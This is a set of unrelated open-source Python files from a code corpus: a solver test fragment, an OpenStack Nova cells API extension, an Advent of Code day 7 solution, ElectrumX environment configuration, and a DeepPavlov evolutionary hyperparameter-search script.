reference data.
"""
path = 'tests/test_data/{}.inp'.format(problem)
specs = _read_schrodinger(path)
vals = dict()
vals['mass'] = specs['mass']
vals['xcords'] = specs['interpolxydecs'][:, 0]
vals['potential'] = specs['interpolxydecs'][:, 1]
vals['xopt'], kind = (specs['xopt'], specs['interpoltype'])
evs = (specs['first_ev'] - 1, specs['last_ev'] - 1)
comp_energies, wfuncs, pot = schroedinger(vals, interpol=True,
interpoltype=kind,
select_range=evs)
comp_funcs = insert(wfuncs.T, 0, values=pot[:, 1].T, axis=1)
ref_energies = loadtxt('tests/test_data/energies_{}.ref'.format(problem))
ref_wfuncs = loadtxt('tests/test_data/wfuncs_{}.ref'.format(problem))
assert allclose(ref_energies, comp_energies)
assert allclose(ref_wfuncs, comp_funcs)
|
the-stack_106_13046
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The cells extension."""
from oslo.config import cfg
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova.cells import rpc_driver
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import api as compute
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('capabilities', 'nova.cells.opts', group='cells')
ALIAS = "os-cells"
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def make_cell(elem):
elem.set('name')
elem.set('username')
elem.set('type')
elem.set('rpc_host')
elem.set('rpc_port')
caps = xmlutil.SubTemplateElement(elem, 'capabilities',
selector='capabilities')
cap = xmlutil.SubTemplateElement(caps, xmlutil.Selector(0),
selector=xmlutil.get_items)
cap.text = 1
make_capacity(elem)
def make_capacity(cell):
def get_units_by_mb(capacity_info):
return capacity_info['units_by_mb'].items()
capacity = xmlutil.SubTemplateElement(cell, 'capacities',
selector='capacities')
ram_free = xmlutil.SubTemplateElement(capacity, 'ram_free',
selector='ram_free')
ram_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(ram_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
disk_free = xmlutil.SubTemplateElement(capacity, 'disk_free',
selector='disk_free')
disk_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(disk_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
cell_nsmap = {None: wsgi.XMLNS_V10}
class CellTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cell', selector='cell')
make_cell(root)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cells')
elem = xmlutil.SubTemplateElement(root, 'cell', selector='cells')
make_cell(elem)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellDeserializer(wsgi.XMLDeserializer):
"""Deserializer to handle xml-formatted cell create requests."""
def _extract_capabilities(self, cap_node):
caps = {}
for cap in cap_node.childNodes:
cap_name = cap.tagName
caps[cap_name] = self.extract_text(cap)
return caps
def _extract_cell(self, node):
cell = {}
cell_node = self.find_first_child_named(node, 'cell')
extract_fns = {
'capabilities': self._extract_capabilities,
'rpc_port': lambda child: int(self.extract_text(child)),
}
for child in cell_node.childNodes:
name = child.tagName
extract_fn = extract_fns.get(name, self.extract_text)
cell[name] = extract_fn(child)
return cell
def default(self, string):
"""Deserialize an xml-formatted cell create request."""
node = xmlutil.safe_minidom_parse_string(string)
return {'body': {'cell': self._extract_cell(node)}}
def _filter_keys(item, keys):
"""
    Filter item (a dict), keeping only the attributes named in keys.
"""
return dict((k, v) for k, v in item.iteritems() if k in keys)
def _fixup_cell_info(cell_info, keys):
"""
If the transport_url is present in the cell, derive username,
rpc_host, and rpc_port from it.
"""
if 'transport_url' not in cell_info:
return
# Disassemble the transport URL
transport_url = cell_info.pop('transport_url')
try:
transport = rpc_driver.parse_transport_url(transport_url)
except ValueError:
# Just go with None's
for key in keys:
cell_info.setdefault(key, None)
return cell_info
transport_field_map = {'rpc_host': 'hostname', 'rpc_port': 'port'}
for key in keys:
if key in cell_info:
continue
transport_field = transport_field_map.get(key, key)
cell_info[key] = transport[transport_field]
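# Illustrative sketch (not part of the original module): for a cell dict with a
# transport_url such as "rabbit://user:pass@host:5672/" (hypothetical values),
# _fixup_cell_info() pops the URL and back-fills the legacy keys, roughly:
#   {'name': 'child1', 'transport_url': 'rabbit://user:pass@host:5672/'}
#     -> {'name': 'child1', 'username': 'user', 'rpc_host': 'host', 'rpc_port': 5672}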
def _scrub_cell(cell, detail=False):
keys = ['name', 'username', 'rpc_host', 'rpc_port']
if detail:
keys.append('capabilities')
cell_info = _filter_keys(cell, keys + ['transport_url'])
_fixup_cell_info(cell_info, keys)
cell_info['type'] = 'parent' if cell['is_parent'] else 'child'
return cell_info
class CellsController(object):
"""Controller for Cell resources."""
def __init__(self):
self.compute_api = compute.API()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
def _get_cells(self, ctxt, req, detail=False):
"""Return all cells."""
# Ask the CellsManager for the most recent data
items = self.cells_rpcapi.get_cell_info_for_neighbors(ctxt)
items = common.limited(items, req)
items = [_scrub_cell(item, detail=detail) for item in items]
return dict(cells=items)
@extensions.expected_errors(())
@wsgi.serializers(xml=CellsTemplate)
def index(self, req):
"""Return all cells in brief."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req)
@extensions.expected_errors(())
@wsgi.serializers(xml=CellsTemplate)
def detail(self, req):
"""Return all cells in detail."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req, detail=True)
@extensions.expected_errors(())
@wsgi.serializers(xml=CellTemplate)
def info(self, req):
"""Return name and capabilities for this cell."""
context = req.environ['nova.context']
authorize(context)
cell_capabs = {}
my_caps = CONF.cells.capabilities
for cap in my_caps:
key, value = cap.split('=')
cell_capabs[key] = value
cell = {'name': CONF.cells.name,
'type': 'self',
'rpc_host': None,
'rpc_port': 0,
'username': None,
'capabilities': cell_capabs}
return dict(cell=cell)
@extensions.expected_errors(404)
@wsgi.serializers(xml=CellTemplate)
def capacities(self, req, id=None):
"""Return capacities for a given cell or all cells."""
# TODO(kaushikc): return capacities as a part of cell info and
# cells detail calls in v3, along with capabilities
context = req.environ['nova.context']
authorize(context)
try:
capacities = self.cells_rpcapi.get_capacities(context,
cell_name=id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return dict(cell={"capacities": capacities})
@extensions.expected_errors(404)
@wsgi.serializers(xml=CellTemplate)
def show(self, req, id):
"""Return data about the given cell name. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
cell = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors((403, 404))
@wsgi.response(204)
def delete(self, req, id):
"""Delete a child or parent cell entry. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
num_deleted = self.cells_rpcapi.cell_delete(context, id)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
if num_deleted == 0:
raise exc.HTTPNotFound(
explanation=_("Cell %s doesn't exist.") % id)
def _validate_cell_name(self, cell_name):
"""Validate cell name is not empty and doesn't contain '!' or '.'."""
if not cell_name:
msg = _("Cell name cannot be empty")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
if '!' in cell_name or '.' in cell_name:
msg = _("Cell name cannot contain '!' or '.'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _validate_cell_type(self, cell_type):
"""Validate cell_type is 'parent' or 'child'."""
if cell_type not in ['parent', 'child']:
msg = _("Cell type must be 'parent' or 'child'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _normalize_cell(self, cell, existing=None):
"""
Normalize input cell data. Normalizations include:
* Converting cell['type'] to is_parent boolean.
* Merging existing transport URL with transport information.
"""
# Start with the cell type conversion
if 'type' in cell:
self._validate_cell_type(cell['type'])
cell['is_parent'] = cell['type'] == 'parent'
del cell['type']
else:
cell['is_parent'] = False
# Now we disassemble the existing transport URL...
transport = {}
if existing and 'transport_url' in existing:
transport = rpc_driver.parse_transport_url(
existing['transport_url'])
# Copy over the input fields
transport_field_map = {
'username': 'username',
'password': 'password',
'hostname': 'rpc_host',
'port': 'rpc_port',
'virtual_host': 'rpc_virtual_host',
}
for key, input_field in transport_field_map.items():
# Set the default value of the field; using setdefault()
# lets us avoid overriding the existing transport URL
transport.setdefault(key, None)
# Only override the value if we're given an override
if input_field in cell:
transport[key] = cell.pop(input_field)
# Now set the transport URL
cell['transport_url'] = rpc_driver.unparse_transport_url(transport)
@extensions.expected_errors((400, 403))
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
@wsgi.response(201)
def create(self, req, body):
"""Create a child cell entry."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
if 'name' not in cell:
msg = _("No cell name in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
self._validate_cell_name(cell['name'])
self._normalize_cell(cell)
try:
cell = self.cells_rpcapi.cell_create(context, cell)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors((400, 403, 404))
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
def update(self, req, id, body):
"""Update a child cell entry. 'id' is the cell name to update."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
cell.pop('id', None)
if 'name' in cell:
self._validate_cell_name(cell['name'])
try:
# NOTE(Vek): There is a race condition here if multiple
# callers are trying to update the cell
# information simultaneously. Since this
# operation is administrative in nature, and
# will be going away in the future, I don't see
# it as much of a problem...
existing = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
self._normalize_cell(cell, existing)
try:
cell = self.cells_rpcapi.cell_update(context, id, cell)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors(400)
@wsgi.response(204)
def sync_instances(self, req, body):
"""Tell all cells to sync instance info."""
context = req.environ['nova.context']
authorize(context)
project_id = body.pop('project_id', None)
deleted = body.pop('deleted', False)
updated_since = body.pop('updated_since', None)
if body:
msg = _("Only 'updated_since' and 'project_id' are understood.")
raise exc.HTTPBadRequest(explanation=msg)
if updated_since:
try:
timeutils.parse_isotime(updated_since)
except ValueError:
msg = _('Invalid changes-since value')
raise exc.HTTPBadRequest(explanation=msg)
self.cells_rpcapi.sync_instances(context, project_id=project_id,
updated_since=updated_since, deleted=deleted)
class Cells(extensions.V3APIExtensionBase):
"""Enables cells-related functionality such as adding neighbor cells,
listing neighbor cells, and getting the capabilities of the local cell.
"""
name = "Cells"
alias = ALIAS
namespace = "http://docs.openstack.org/compute/ext/cells/api/v3"
version = 1
def get_resources(self):
coll_actions = {
'detail': 'GET',
'info': 'GET',
'sync_instances': 'POST',
'capacities': 'GET',
}
memb_actions = {
'capacities': 'GET',
}
res = extensions.ResourceExtension(ALIAS, CellsController(),
collection_actions=coll_actions,
member_actions=memb_actions)
return [res]
def get_controller_extensions(self):
return []
|
the-stack_106_13047
|
def read_input(file_name: str) -> [int]:
with open("inputFiles/" + file_name, "r") as file:
lines = file.read().splitlines()[0].split(",")
return [int(i) for i in lines]
def part1(input_value: [int]):
min_fuel = -1
for i in range(max(input_value)):
fuel = 0
for fish in input_value:
fuel += abs(i - fish)
if min_fuel == -1 or fuel < min_fuel:
min_fuel = fuel
return min_fuel
def part2(input_value: [int]):
min_fuel = -1
for i in range(max(input_value)):
fuel = 0
for fish in input_value:
fuel += sum(range(1, abs(i - fish) + 1))
if min_fuel == -1 or fuel < min_fuel:
min_fuel = fuel
return min_fuel
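# Note (added for illustration, not part of the original solution): the inner
# sum(range(1, n + 1)) in part2 is the n-th triangular number, so the step cost
# can also be computed in O(1) with the closed form n * (n + 1) // 2. A sketch
# of the same search using that formula (scanning the full 0..max range):
def part2_closed_form(input_value: [int]) -> int:
    def cost(target: int) -> int:
        return sum(abs(target - pos) * (abs(target - pos) + 1) // 2
                   for pos in input_value)
    return min(cost(i) for i in range(max(input_value) + 1))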
if __name__ == "__main__":
puzzle_input = read_input("day7.txt")
print(f"Part 1: {part1(puzzle_input)}")
print(f"Part 2: {part2(puzzle_input)}")
|
the-stack_106_13048
|
# Copyright (c) 2016, Neil Booth
#
# All rights reserved.
#
# See the file "LICENCE" for information about the copyright
# and warranty status of this software.
'''Class for handling environment configuration and defaults.'''
import re
from ipaddress import IPv4Address, IPv6Address
from aiorpcx import Service, ServicePart
from electrumx.lib.coins import Coin
from electrumx.lib.env_base import EnvBase
class ServiceError(Exception):
pass
class Env(EnvBase):
'''Wraps environment configuration. Optionally, accepts a Coin class
as first argument to have ElectrumX serve custom coins not part of
the standard distribution.
'''
# Peer discovery
PD_OFF, PD_SELF, PD_ON = ('OFF', 'SELF', 'ON')
SSL_PROTOCOLS = {'ssl', 'wss'}
KNOWN_PROTOCOLS = {'ssl', 'tcp', 'ws', 'wss', 'rpc'}
def __init__(self, coin=None):
super().__init__()
self.obsolete(["MAX_SUBSCRIPTIONS", "MAX_SUBS", "MAX_SESSION_SUBS", "BANDWIDTH_LIMIT",
"HOST", "TCP_PORT", "SSL_PORT", "RPC_HOST", "RPC_PORT", "REPORT_HOST",
"REPORT_TCP_PORT", "REPORT_SSL_PORT", "REPORT_HOST_TOR",
"REPORT_TCP_PORT_TOR", "REPORT_SSL_PORT_TOR"])
# Core items
self.db_dir = self.required('DB_DIRECTORY')
self.daemon_url = self.required('DAEMON_URL')
if coin is not None:
assert issubclass(coin, Coin)
self.coin = coin
else:
coin_name = self.required('COIN').strip()
network = self.default('NET', 'mainnet').strip()
self.coin = Coin.lookup_coin_class(coin_name, network)
# Peer discovery
self.peer_discovery = self.peer_discovery_enum()
self.peer_announce = self.boolean('PEER_ANNOUNCE', True)
self.force_proxy = self.boolean('FORCE_PROXY', False)
self.tor_proxy_host = self.default('TOR_PROXY_HOST', 'localhost')
self.tor_proxy_port = self.integer('TOR_PROXY_PORT', None)
# Misc
self.db_engine = self.default('DB_ENGINE', 'leveldb')
self.banner_file = self.default('BANNER_FILE', None)
self.tor_banner_file = self.default('TOR_BANNER_FILE',
self.banner_file)
self.anon_logs = self.boolean('ANON_LOGS', False)
self.log_sessions = self.integer('LOG_SESSIONS', 3600)
self.log_level = self.default('LOG_LEVEL', 'info').upper()
self.donation_address = self.default('DONATION_ADDRESS', '')
self.drop_client = self.custom("DROP_CLIENT", None, re.compile)
self.drop_client_unknown = self.boolean('DROP_CLIENT_UNKNOWN', False)
self.blacklist_url = self.default('BLACKLIST_URL', self.coin.BLACKLIST_URL)
self.cache_MB = self.integer('CACHE_MB', 1200)
self.reorg_limit = self.integer('REORG_LIMIT', self.coin.REORG_LIMIT)
# Server limits to help prevent DoS
self.max_send = self.integer('MAX_SEND', self.coin.DEFAULT_MAX_SEND)
self.max_sessions = self.sane_max_sessions()
self.cost_soft_limit = self.integer('COST_SOFT_LIMIT', 1000)
self.cost_hard_limit = self.integer('COST_HARD_LIMIT', 10000)
self.bw_unit_cost = self.integer('BANDWIDTH_UNIT_COST', 5000)
self.initial_concurrent = self.integer('INITIAL_CONCURRENT', 10)
self.request_sleep = self.integer('REQUEST_SLEEP', 2500)
self.request_timeout = self.integer('REQUEST_TIMEOUT', 30)
self.session_timeout = self.integer('SESSION_TIMEOUT', 600)
# Services last - uses some env vars above
self.services = self.services_to_run()
if {service.protocol for service in self.services}.intersection(self.SSL_PROTOCOLS):
self.ssl_certfile = self.required('SSL_CERTFILE')
self.ssl_keyfile = self.required('SSL_KEYFILE')
self.report_services = self.services_to_report()
def sane_max_sessions(self):
'''Return the maximum number of sessions to permit. Normally this
        is MAX_SESSIONS. However, to prevent open file exhaustion, adjust
downwards if running with a small open file rlimit.'''
env_value = self.integer('MAX_SESSIONS', 1000)
# No resource module on Windows
try:
import resource
nofile_limit = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
# We give the DB 250 files; allow ElectrumX 100 for itself
value = max(0, min(env_value, nofile_limit - 350))
if value < env_value:
self.logger.warning(
f'lowered maximum sessions from {env_value:,d} to '
f'{value:,d} because your open file limit is '
f'{nofile_limit:,d}'
)
except ImportError:
            value = 512  # that is what's returned by stdio's _getmaxstdio()
return value
def _parse_services(self, services_str, default_func):
result = []
for service_str in services_str.split(','):
if not service_str:
continue
try:
service = Service.from_string(service_str, default_func=default_func)
except Exception as e:
raise ServiceError(f'"{service_str}" invalid: {e}') from None
if service.protocol not in self.KNOWN_PROTOCOLS:
raise ServiceError(f'"{service_str}" invalid: unknown protocol')
result.append(service)
# Find duplicate addresses
service_map = {service.address: [] for service in result}
for service in result:
service_map[service.address].append(service)
for address, services in service_map.items():
if len(services) > 1:
raise ServiceError(f'address {address} has multiple services')
return result
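    # Illustrative note (not part of the original module): SERVICES and
    # REPORT_SERVICES are comma-separated "protocol://host:port" strings, each
    # parsed above via aiorpcx's Service.from_string(); e.g. a hypothetical
    # environment setting:
    #   SERVICES=tcp://:50001,ssl://:50002,rpc://localhost:8000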
def services_to_run(self):
def default_part(protocol, part):
return default_services.get(protocol, {}).get(part)
default_services = {protocol: {ServicePart.HOST: 'all_interfaces'}
for protocol in self.KNOWN_PROTOCOLS}
default_services['rpc'] = {ServicePart.HOST: 'localhost', ServicePart.PORT: 8000}
services = self._parse_services(self.default('SERVICES', ''), default_part)
# Find onion hosts
for service in services:
if str(service.host).endswith('.onion'):
raise ServiceError(f'bad host for SERVICES: {service}')
return services
def services_to_report(self):
services = self._parse_services(self.default('REPORT_SERVICES', ''), None)
for service in services:
if service.protocol == 'rpc':
raise ServiceError(f'bad protocol for REPORT_SERVICES: {service.protocol}')
if isinstance(service.host, (IPv4Address, IPv6Address)):
ip_addr = service.host
if (ip_addr.is_multicast or ip_addr.is_unspecified or
(ip_addr.is_private and self.peer_announce)):
raise ServiceError(f'bad IP address for REPORT_SERVICES: {ip_addr}')
elif service.host.lower() == 'localhost':
raise ServiceError(f'bad host for REPORT_SERVICES: {service.host}')
return services
def peer_discovery_enum(self):
pd = self.default('PEER_DISCOVERY', 'on').strip().lower()
if pd in ('off', ''):
return self.PD_OFF
elif pd == 'self':
return self.PD_SELF
else:
return self.PD_ON
|
the-stack_106_13049
|
"""
Copyright 2017 Neural Networks and Deep Learning lab, MIPT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from pathlib import Path
import sys
import os
import json
from copy import deepcopy
from subprocess import Popen, PIPE
import pandas as pd
p = (Path(__file__) / ".." / "..").resolve()
sys.path.append(str(p))
from deeppavlov.core.common.errors import ConfigError
from deeppavlov.models.evolution.evolution_param_generator import ParamsEvolution
from deeppavlov.core.common.file import read_json, save_json
from deeppavlov.core.common.log import get_logger
from deeppavlov.core.commands.utils import set_deeppavlov_root, expand_path
log = get_logger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument("config_path", help="path to a pipeline json config", type=str)
parser.add_argument('--key_main_model', help='key inserted in dictionary of main model in pipe', default="main")
parser.add_argument('--p_cross', help='probability of crossover', type=float, default=0.2)
parser.add_argument('--pow_cross', help='crossover power', type=float, default=0.1)
parser.add_argument('--p_mut', help='probability of mutation', type=float, default=1.)
parser.add_argument('--pow_mut', help='mutation power', type=float, default=0.1)
parser.add_argument('--p_size', help='population size', type=int, default=10)
parser.add_argument('--gpus', help='visible GPUs divided by comma <<,>>', default="-1")
parser.add_argument('--train_partition',
                    help='partition of split train file', default=1)
parser.add_argument('--start_from_population',
help='population number to start from. 0 means from scratch', default=0)
parser.add_argument('--path_to_population',
help='path to population to start from', default="")
parser.add_argument('--elitism_with_weights',
help='whether to save elite models with weights or without', action='store_true')
parser.add_argument('--iterations', help='Number of iterations', type=int, default=-1)
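# Example invocation (added for illustration; the config path and values are
# hypothetical):
#   python evolve.py my_pipeline_config.json --p_size 10 --gpus 0,1 --iterations 20
# i.e. a pipeline config plus the evolution hyper-parameters defined above.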
def find_config(pipeline_config_path: str):
if not Path(pipeline_config_path).is_file():
configs = [c for c in Path(__file__).parent.glob(f'configs/**/{pipeline_config_path}.json')
if str(c.with_suffix('')).endswith(pipeline_config_path)] # a simple way to not allow * and ?
if configs:
log.info(f"Interpreting '{pipeline_config_path}' as '{configs[0]}'")
pipeline_config_path = str(configs[0])
return pipeline_config_path
def main():
args = parser.parse_args()
pipeline_config_path = find_config(args.config_path)
key_main_model = args.key_main_model
population_size = args.p_size
gpus = [int(gpu) for gpu in args.gpus.split(",")]
train_partition = int(args.train_partition)
start_from_population = int(args.start_from_population)
path_to_population = args.path_to_population
elitism_with_weights = args.elitism_with_weights
iterations = int(args.iterations)
p_crossover = args.p_cross
pow_crossover = args.pow_cross
p_mutation = args.p_mut
pow_mutation = args.pow_mut
if os.environ.get("CUDA_VISIBLE_DEVICES") is None:
pass
else:
cvd = [int(gpu) for gpu in os.environ.get("CUDA_VISIBLE_DEVICES").split(",")]
if gpus == [-1]:
gpus = cvd
else:
try:
gpus = [cvd[gpu] for gpu in gpus]
except:
raise ConfigError("Can not use gpus `{}` with CUDA_VISIBLE_DEVICES='{}'".format(
",".join(gpus), ",".join(cvd)
))
basic_params = read_json(pipeline_config_path)
log.info("Given basic params: {}\n".format(json.dumps(basic_params, indent=2)))
# Initialize evolution
evolution = ParamsEvolution(population_size=population_size,
p_crossover=p_crossover, crossover_power=pow_crossover,
p_mutation=p_mutation, mutation_power=pow_mutation,
key_main_model=key_main_model,
seed=42,
train_partition=train_partition,
elitism_with_weights=elitism_with_weights,
**basic_params)
considered_metrics = evolution.get_value_from_config(evolution.basic_config,
list(evolution.find_model_path(
evolution.basic_config, "metrics"))[0] + ["metrics"])
log.info(considered_metrics)
evolve_metric = considered_metrics[0]
# Create table variable for gathering results
set_deeppavlov_root(evolution.basic_config)
expand_path(Path(evolution.get_value_from_config(
evolution.basic_config, evolution.main_model_path + ["save_path"]))).mkdir(parents=True, exist_ok=True)
result_file = expand_path(Path(evolution.get_value_from_config(evolution.basic_config,
evolution.main_model_path + ["save_path"])
).joinpath("result_table.csv"))
result_table_columns = []
result_table_dict = {}
for el in considered_metrics:
result_table_dict[el + "_valid"] = []
result_table_dict[el + "_test"] = []
result_table_columns.extend([el + "_valid", el + "_test"])
result_table_dict["params"] = []
result_table_columns.append("params")
if start_from_population == 0:
# if starting evolution from scratch
iters = 0
result_table = pd.DataFrame(result_table_dict)
# write down result table file
result_table.loc[:, result_table_columns].to_csv(result_file, index=False, sep='\t')
log.info("Iteration #{} starts".format(iters))
# randomly generate the first population
population = evolution.first_generation()
else:
# if starting evolution from already existing population
iters = start_from_population
log.info("Iteration #{} starts".format(iters))
population = []
for i in range(population_size):
population.append(read_json(expand_path(Path(path_to_population).joinpath(
"model_" + str(i)).joinpath("config.json"))))
population[i] = evolution.insert_value_or_dict_into_config(
population[i], evolution.main_model_path + ["save_path"],
str(Path(
evolution.get_value_from_config(evolution.basic_config, evolution.main_model_path + ["save_path"])
).joinpath(
"population_" + str(start_from_population)).joinpath(
"model_" + str(i)).joinpath(
"model")))
population[i] = evolution.insert_value_or_dict_into_config(
population[i], evolution.main_model_path + ["load_path"],
str(Path(
evolution.get_value_from_config(population[i], evolution.main_model_path + ["load_path"]))))
for path_id, path_ in enumerate(evolution.paths_to_fiton_dicts):
population[i] = evolution.insert_value_or_dict_into_config(
population[i], path_ + ["save_path"],
str(Path(evolution.get_value_from_config(evolution.basic_config,
evolution.main_model_path + ["save_path"])
).joinpath("population_" + str(iters)).joinpath("model_" + str(i)).joinpath(
"fitted_model_" + str(path_id))))
for path_id, path_ in enumerate(evolution.paths_to_fiton_dicts):
population[i] = evolution.insert_value_or_dict_into_config(
population[i], path_ + ["load_path"],
str(Path(evolution.get_value_from_config(
population[i], path_ + ["load_path"]))))
run_population(population, evolution, gpus)
population_scores = results_to_table(population, evolution, considered_metrics,
result_file, result_table_columns)[evolve_metric]
log.info("Population scores: {}".format(population_scores))
log.info("Iteration #{} was done".format(iters))
iters += 1
while True:
if iterations != -1 and start_from_population + iterations == iters:
log.info("End of evolution on iteration #{}".format(iters))
break
log.info("Iteration #{} starts".format(iters))
population = evolution.next_generation(population, population_scores, iters)
run_population(population, evolution, gpus)
population_scores = results_to_table(population, evolution, considered_metrics,
result_file, result_table_columns)[evolve_metric]
log.info("Population scores: {}".format(population_scores))
log.info("Iteration #{} was done".format(iters))
iters += 1
def run_population(population, evolution, gpus):
"""
    Change save and load paths for the obtained population, save config.json with each model's config,
    and run the population via the current python executable (the one evolve.py was started with)
    on the given devices (-1 means CPU, other integers are GPUs visible to evolve.py)
Args:
population: list of dictionaries - configs of current population
evolution: ParamsEvolution
gpus: list of given devices (list of integers)
Returns:
None
"""
population_size = len(population)
for k in range(population_size // len(gpus) + 1):
procs = []
for j in range(len(gpus)):
i = k * len(gpus) + j
if i < population_size:
save_path = expand_path(Path(evolution.get_value_from_config(
population[i], evolution.main_model_path + ["save_path"])).parent)
save_path.mkdir(parents=True, exist_ok=True)
f_name = save_path.joinpath("config.json")
save_json(population[i], f_name)
if len(gpus) == 1 and gpus[0] == -1:
procs.append(Popen("{} -m deeppavlov train {}"
" 1>{}/out.txt 2>{}/err.txt".format(sys.executable,
str(f_name),
str(save_path),
str(save_path)
),
shell=True, stdout=PIPE, stderr=PIPE))
else:
procs.append(Popen("CUDA_VISIBLE_DEVICES={} {} -m deeppavlov train {}"
" 1>{}/out.txt 2>{}/err.txt".format(gpus[j],
sys.executable,
str(f_name),
str(save_path),
str(save_path)
),
shell=True, stdout=PIPE, stderr=PIPE))
for j, proc in enumerate(procs):
i = k * len(gpus) + j
log.info(f'Waiting on {i}th proc')
proc.wait()
return None
def results_to_table(population, evolution, considered_metrics, result_file, result_table_columns):
population_size = len(population)
validate_best = evolution.get_value_from_config(evolution.basic_config,
list(evolution.find_model_path(
evolution.basic_config, "validate_best"))[0]
+ ["validate_best"])
test_best = evolution.get_value_from_config(evolution.basic_config,
list(evolution.find_model_path(
evolution.basic_config, "test_best"))[0]
+ ["test_best"])
if (not validate_best) and test_best:
log.info("Validate_best is set to False. Tuning parameters on test")
elif (not validate_best) and (not test_best):
raise ConfigError("Validate_best and test_best are set to False. Can not evolve.")
population_metrics = {}
for m in considered_metrics:
population_metrics[m] = []
for i in range(population_size):
with open(str(expand_path(Path(evolution.get_value_from_config(
population[i],
evolution.main_model_path + ["save_path"])).parent.joinpath("out.txt"))), "r", encoding='utf8') as fout:
reports_data = fout.read().splitlines()[-2:]
reports = []
for j in range(2):
try:
reports.append(json.loads(reports_data[j]))
except:
pass
val_results = {}
test_results = {}
for m in considered_metrics:
val_results[m] = None
test_results[m] = None
if len(reports) == 2 and "valid" in reports[0].keys() and "test" in reports[1].keys():
val_results = reports[0]["valid"]["metrics"]
test_results = reports[1]["test"]["metrics"]
elif len(reports) == 2 and "valid" in reports[0].keys() and "valid" in reports[1].keys():
val_results = reports[1]["valid"]["metrics"]
elif len(reports) == 2 and "test" in reports[0].keys() and "test" in reports[1].keys():
val_results = reports[1]["test"]["metrics"]
elif len(reports) == 2 and "train" in reports[0].keys() and "valid" in reports[1].keys():
val_results = reports[1]["valid"]["metrics"]
elif len(reports) == 2 and "train" in reports[0].keys() and "test" in reports[1].keys():
val_results = reports[1]["test"]["metrics"]
elif len(reports) == 2 and "train" in reports[0].keys() and "train" in reports[1].keys():
val_results = reports[1]["train"]["metrics"]
elif len(reports) == 1 and "valid" in reports[0].keys():
val_results = reports[0]["valid"]["metrics"]
elif len(reports) == 1 and "test" in reports[0].keys():
test_results = reports[0]["test"]["metrics"]
else:
raise ConfigError("Can not proceed output files: didn't find valid and/or test results")
result_table_dict = {}
for el in result_table_columns:
result_table_dict[el] = []
for m in considered_metrics:
result_table_dict[m + "_valid"].append(val_results[m])
result_table_dict[m + "_test"].append(test_results[m])
if validate_best:
population_metrics[m].append(val_results[m])
elif test_best:
population_metrics[m].append(test_results[m])
result_table_dict[result_table_columns[-1]] = [population[i]]
result_table = pd.DataFrame(result_table_dict)
result_table.loc[:, result_table_columns].to_csv(result_file, index=False, sep='\t', mode='a', header=None)
return population_metrics
if __name__ == "__main__":
main()
|
the-stack_106_13050
|
